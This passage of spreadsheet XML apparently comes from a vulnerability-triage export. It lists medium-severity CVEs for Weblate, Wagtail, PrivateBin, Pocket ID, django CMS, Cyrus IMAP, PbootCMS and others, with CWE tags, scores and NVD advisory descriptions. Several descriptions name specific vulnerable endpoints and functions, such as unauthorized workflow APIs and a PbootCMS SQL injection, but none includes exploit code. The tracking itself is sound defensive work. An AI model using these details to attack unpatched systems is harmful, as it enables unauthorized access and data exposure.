          <t>Weblate is a web-based localization tool. In versions prior to 2026.7, several endpoints look up objects in a globally scoped manner rather than restricting the lookup to projects the user can access, so they return HTTP 403 (Forbidden) instead of 404 (Not Found) when a user requests an object they are not authorized to see. This difference lets unauthorized users infer whether a given object exists in a private Weblate project. The issue has been fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S1110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55227</t>
        </is>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1111" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55468</t>
        </is>
      </c>
      <c r="D1111" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1111" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1111" s="5" t="inlineStr"/>
      <c r="H1111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1111" s="5" t="inlineStr"/>
      <c r="J1111" s="5" t="inlineStr"/>
      <c r="K1111" s="5" t="inlineStr"/>
      <c r="L1111" s="5" t="inlineStr"/>
      <c r="M1111" s="5" t="inlineStr"/>
      <c r="N1111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1111" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1111" s="5" t="inlineStr"/>
      <c r="Q1111" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="R1111" s="5" t="inlineStr">
        <is>
          <t>Wagtail is an open source content management system built on Django. Prior to versions 7.0.9, 7.3.4, 7.4.3, and 8.0rc2 on their respective release lines, the internal Pages admin API returns page fields declared in api_fields without sufficient access control, allowing a user with Wagtail admin access to retrieve restricted draft and live page content. This issue is fixed in versions 7.0.9, 7.3.4, 7.4.3, and 8.0rc2.</t>
        </is>
      </c>
      <c r="S1111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55468</t>
        </is>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1112" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55696</t>
        </is>
      </c>
      <c r="D1112" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1112" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1112" s="5" t="inlineStr"/>
      <c r="H1112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1112" s="5" t="inlineStr"/>
      <c r="J1112" s="5" t="inlineStr"/>
      <c r="K1112" s="5" t="inlineStr"/>
      <c r="L1112" s="5" t="inlineStr"/>
      <c r="M1112" s="5" t="inlineStr"/>
      <c r="N1112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1112" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1112" s="5" t="inlineStr"/>
      <c r="Q1112" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="R1112" s="5" t="inlineStr">
        <is>
          <t>PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Prior to 2.0.5, AttachmentViewer.setAttachment in js/privatebin.js uses getAttachmentMimeType to accept attacker-controlled MIME types and uses getBlobUrl to create a same-origin blob before setting attachmentLink's href for the Download attachment link. The SVG-only sanitization branch updates only the preview blob, so text/html, image/svg, application/xhtml+xml, and text/xml attachments can remain active in the download blob. On an instance with fileupload = true and a weakened, stripped, or absent Content Security Policy, an anonymous attacker can create such an attachment, and a victim who opens the link in a new tab causes inline JavaScript to execute in the PrivateBin origin. The script can read origin-scoped local storage and issue same-origin requests, including requests to applications co-hosted on the same domain. This issue is fixed in version 2.0.5.</t>
        </is>
      </c>
      <c r="S1112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55696</t>
        </is>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55834</t>
        </is>
      </c>
      <c r="D1113" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1113" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1113" s="5" t="inlineStr"/>
      <c r="H1113" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1113" s="5" t="inlineStr"/>
      <c r="J1113" s="5" t="inlineStr"/>
      <c r="K1113" s="5" t="inlineStr"/>
      <c r="L1113" s="5" t="inlineStr"/>
      <c r="M1113" s="5" t="inlineStr"/>
      <c r="N1113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1113" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1113" s="5" t="inlineStr"/>
      <c r="Q1113" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1113" s="5" t="inlineStr">
        <is>
          <t>Pocket ID is an OIDC provider that allows users to authenticate with their passkeys to services. From 2.6.0 until 2.9.0, frontend/src/routes/authorize/+page.ts reads the redirect_uri query parameter and frontend/src/routes/authorize/+page.svelte uses the raw callbackURL in redirectWithError when prompt=none cannot complete silent authorization. The client-side path only blocks javascript and data schemes and does not invoke the backend callback allow-list validation, so an unauthenticated attacker who knows a valid client_id can redirect a victim browser to an arbitrary HTTP or HTTPS origin for phishing or OIDC error and state smuggling. This issue is fixed in version 2.9.0.</t>
        </is>
      </c>
      <c r="S1113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55834</t>
        </is>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1114" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61663</t>
        </is>
      </c>
      <c r="D1114" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1114" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1114" s="5" t="inlineStr"/>
      <c r="H1114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1114" s="5" t="inlineStr"/>
      <c r="J1114" s="5" t="inlineStr"/>
      <c r="K1114" s="5" t="inlineStr"/>
      <c r="L1114" s="5" t="inlineStr"/>
      <c r="M1114" s="5" t="inlineStr"/>
      <c r="N1114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1114" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1114" s="5" t="inlineStr"/>
      <c r="Q1114" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R1114" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. Prior to 5.0.9, render_object_structure fails to authorize non-PageContent objects that use PlaceholderRelationField. An active staff user without cms.use_structure or model-level view or change permission can request the //admin/cms/placeholder/object/&lt;content_type_id&gt;/structure/&lt;object_id&gt;/ endpoint with guessed content_type_id and object_id values. The response discloses placeholder slot names, plugin trees, plugin identifiers, labels, and object existence for frontend-editable objects. The fix applies user_can_view_placeholder_source to the non-PageContent branch while keeping the structure board read-only for view-only users. This issue is fixed in versions 5.0.9.</t>
        </is>
      </c>
      <c r="S1114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61663</t>
        </is>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61907</t>
        </is>
      </c>
      <c r="D1115" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1115" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1115" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1115" s="5" t="inlineStr"/>
      <c r="H1115" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1115" s="5" t="inlineStr"/>
      <c r="J1115" s="5" t="inlineStr"/>
      <c r="K1115" s="5" t="inlineStr"/>
      <c r="L1115" s="5" t="inlineStr"/>
      <c r="M1115" s="5" t="inlineStr"/>
      <c r="N1115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1115" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1115" s="5" t="inlineStr"/>
      <c r="Q1115" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1115" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. JMAP snooze bypasses the destination-mailbox ACL. An authenticated user with insert permissions on another user's snoozed mailbox could cause insertion of mail to that user's inbox, or any other of their mailboxes whose id was known to the user, despite having no insert permissions to the target mailbox.</t>
        </is>
      </c>
      <c r="S1115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61907</t>
        </is>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61909</t>
        </is>
      </c>
      <c r="D1116" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1116" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1116" s="5" t="inlineStr"/>
      <c r="H1116" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1116" s="5" t="inlineStr"/>
      <c r="J1116" s="5" t="inlineStr"/>
      <c r="K1116" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L1116" s="5" t="inlineStr"/>
      <c r="M1116" s="5" t="inlineStr"/>
      <c r="N1116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1116" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1116" s="5" t="inlineStr"/>
      <c r="Q1116" s="5" t="inlineStr">
        <is>
          <t>CWE-420</t>
        </is>
      </c>
      <c r="R1116" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. CalDAV/CardDAV multiget bypasses a per-href ACL. An authenticated DAV user with some shared access to another user's calendar or address book could read even unshared events or contacts by including the target hrefs in a calendar-multiget or addressbook-multiget REPORT.</t>
        </is>
      </c>
      <c r="S1116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61909</t>
        </is>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61911</t>
        </is>
      </c>
      <c r="D1117" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1117" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1117" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1117" s="5" t="inlineStr"/>
      <c r="H1117" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1117" s="5" t="inlineStr"/>
      <c r="J1117" s="5" t="inlineStr"/>
      <c r="K1117" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L1117" s="5" t="inlineStr"/>
      <c r="M1117" s="5" t="inlineStr"/>
      <c r="N1117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1117" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1117" s="5" t="inlineStr"/>
      <c r="Q1117" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R1117" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a Sieve mailbox existence oracle. An authenticated user could install a Sieve script that probed whether another user's private mailbox existed, or read the value of shared mailbox annotations, by observing which fileinto branch fired during LMTP delivery.</t>
        </is>
      </c>
      <c r="S1117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61911</t>
        </is>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1118" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62249</t>
        </is>
      </c>
      <c r="D1118" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1118" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1118" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1118" s="5" t="inlineStr"/>
      <c r="H1118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1118" s="5" t="inlineStr"/>
      <c r="J1118" s="5" t="inlineStr"/>
      <c r="K1118" s="5" t="inlineStr"/>
      <c r="L1118" s="5" t="inlineStr"/>
      <c r="M1118" s="5" t="inlineStr"/>
      <c r="N1118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1118" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1118" s="5" t="inlineStr"/>
      <c r="Q1118" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-285</t>
        </is>
      </c>
      <c r="R1118" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, an authenticated user with access to a project can retrieve the change history of restricted components in that project through nested API change endpoints, even without permission to view those components directly. The nested endpoints do not apply the component-level access checks enforced on the direct component views, so the requester can enumerate changes for components that should be hidden from them. The exposed data can include the restricted component's identity, translation and unit links, and change payload fields such as source or translated string content in the target, old, and details values. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S1118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62249</t>
        </is>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1119" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62986</t>
        </is>
      </c>
      <c r="D1119" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1119" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1119" s="5" t="inlineStr"/>
      <c r="H1119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1119" s="5" t="inlineStr"/>
      <c r="J1119" s="5" t="inlineStr"/>
      <c r="K1119" s="5" t="inlineStr"/>
      <c r="L1119" s="5" t="inlineStr"/>
      <c r="M1119" s="5" t="inlineStr"/>
      <c r="N1119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1119" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1119" s="5" t="inlineStr"/>
      <c r="Q1119" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-457, CWE-908</t>
        </is>
      </c>
      <c r="R1119" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13, the PyOpenEXR Python bindings return stale heap data when reading a crafted deep scanline EXR that uses layer-prefixed RGB channels. With the default channel coalescing (separate_channels=False), the wrapper groups channels such as left.R, left.G, and left.B into a single RGB sample array, but the lane-offset calculation in PyPart::setDeepSliceData() only recognizes the exact unprefixed names G, B, and A. As a result, prefixed channels like left.G and left.B are decoded into lane 0 while lanes 1 and 2 are left uninitialized and returned to Python. A Python application that reads untrusted deep EXR files through the default OpenEXR.File API and then logs, serializes, previews, or otherwise processes the resulting NumPy sample arrays may expose uninitialized same-process heap contents, in addition to receiving incorrect green and blue channel data. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="S1119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62986</t>
        </is>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71807</t>
        </is>
      </c>
      <c r="D1120" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1120" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1120" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1120" s="5" t="inlineStr"/>
      <c r="H1120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1120" s="5" t="inlineStr"/>
      <c r="J1120" s="5" t="inlineStr"/>
      <c r="K1120" s="5" t="inlineStr"/>
      <c r="L1120" s="5" t="inlineStr"/>
      <c r="M1120" s="5" t="inlineStr"/>
      <c r="N1120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1120" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1120" s="5" t="inlineStr"/>
      <c r="Q1120" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1120" s="5" t="inlineStr">
        <is>
          <t>In RuoYi-Cloud-Plus &lt;= 2.6.2 in the ruoyi-workflow module, multiple core task APIs in FlwTaskController lack permission annotations, and the Service layer does not verify whether the current user is the task handler/related user. Authenticated low-privileged remote attackers can read sensitive workflow task details (/task/getTask/{taskId}) and trigger unauthorized workflow executions (/task/startWorkFlow).</t>
        </is>
      </c>
      <c r="S1120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71807</t>
        </is>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1121" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75601</t>
        </is>
      </c>
      <c r="D1121" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1121" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1121" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1121" s="5" t="inlineStr"/>
      <c r="H1121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1121" s="5" t="inlineStr"/>
      <c r="J1121" s="5" t="inlineStr"/>
      <c r="K1121" s="5" t="inlineStr"/>
      <c r="L1121" s="5" t="inlineStr"/>
      <c r="M1121" s="5" t="inlineStr"/>
      <c r="N1121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1121" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1121" s="5" t="inlineStr"/>
      <c r="Q1121" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1121" s="5" t="inlineStr">
        <is>
          <t>Static Web Server (SWS) is a production-ready web server suitable for static web files or assets. Through 2.43.0, instances with both basic-auth and metrics features enabled process the /metrics endpoint before the basic-auth check in src/handler.rs, allowing an unauthenticated remote attacker to retrieve Prometheus metrics that disclose virtual host names, request volumes, error rates, latency distributions, and active connections. This issue is fixed in version 2.44.0.</t>
        </is>
      </c>
      <c r="S1121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75601</t>
        </is>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75905</t>
        </is>
      </c>
      <c r="D1122" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1122" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1122" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1122" s="5" t="inlineStr"/>
      <c r="H1122" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1122" s="5" t="inlineStr"/>
      <c r="J1122" s="5" t="inlineStr"/>
      <c r="K1122" s="5" t="inlineStr"/>
      <c r="L1122" s="5" t="inlineStr"/>
      <c r="M1122" s="5" t="inlineStr"/>
      <c r="N1122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1122" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1122" s="5" t="inlineStr"/>
      <c r="Q1122" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1122" s="5" t="inlineStr">
        <is>
          <t>The WP Recipe Maker plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 10.8.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to take ownership of any admin-authored recipe by rewriting its post_author to the attacker's user ID, and unpublish it by overwriting its post_status with the contributor's draft or pending post status. This requires the default 'recipe_use_author' setting to be set to 'parent' for the ownership transfer to occur, though unpublishing remains possible regardless of this setting.</t>
        </is>
      </c>
      <c r="S1122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75905</t>
        </is>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79387</t>
        </is>
      </c>
      <c r="D1123" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1123" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1123" s="5" t="inlineStr"/>
      <c r="H1123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1123" s="5" t="inlineStr"/>
      <c r="J1123" s="5" t="inlineStr"/>
      <c r="K1123" s="5" t="inlineStr"/>
      <c r="L1123" s="5" t="inlineStr"/>
      <c r="M1123" s="5" t="inlineStr"/>
      <c r="N1123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1123" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1123" s="5" t="inlineStr"/>
      <c r="Q1123" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1123" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in PbootCMS versions 3.2.0 through 3.2.5 allows an authenticated user to modify arbitrary user account fields (including passwords and roles) via crafted parameters to the User/mod interface, enabling account takeover.</t>
        </is>
      </c>
      <c r="S1123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79387</t>
        </is>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79515</t>
        </is>
      </c>
      <c r="D1124" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1124" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1124" s="5" t="inlineStr"/>
      <c r="H1124" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1124" s="5" t="inlineStr"/>
      <c r="J1124" s="5" t="inlineStr"/>
      <c r="K1124" s="5" t="inlineStr"/>
      <c r="L1124" s="5" t="inlineStr"/>
      <c r="M1124" s="5" t="inlineStr"/>
      <c r="N1124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1124" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1124" s="5" t="inlineStr"/>
      <c r="Q1124" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1124" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the stbtt_GetGlyphShape component of nothings stb commit 31c1ad3 allows attackers to cause a Denial of Service (DoS) via sending a crafted TTF file.</t>
        </is>
      </c>
      <c r="S1124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79515</t>
        </is>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81644</t>
        </is>
      </c>
      <c r="D1125" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1125" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G1125" s="5" t="inlineStr"/>
      <c r="H1125" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1125" s="5" t="inlineStr"/>
      <c r="J1125" s="5" t="inlineStr"/>
      <c r="K1125" s="5" t="inlineStr"/>
      <c r="L1125" s="5" t="inlineStr"/>
      <c r="M1125" s="5" t="inlineStr"/>
      <c r="N1125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1125" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1125" s="5" t="inlineStr"/>
      <c r="Q1125" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R1125" s="5" t="inlineStr">
        <is>
          <t>DoS vulnerability in the preview service module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S1125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81644</t>
        </is>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82185</t>
        </is>
      </c>
      <c r="D1126" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
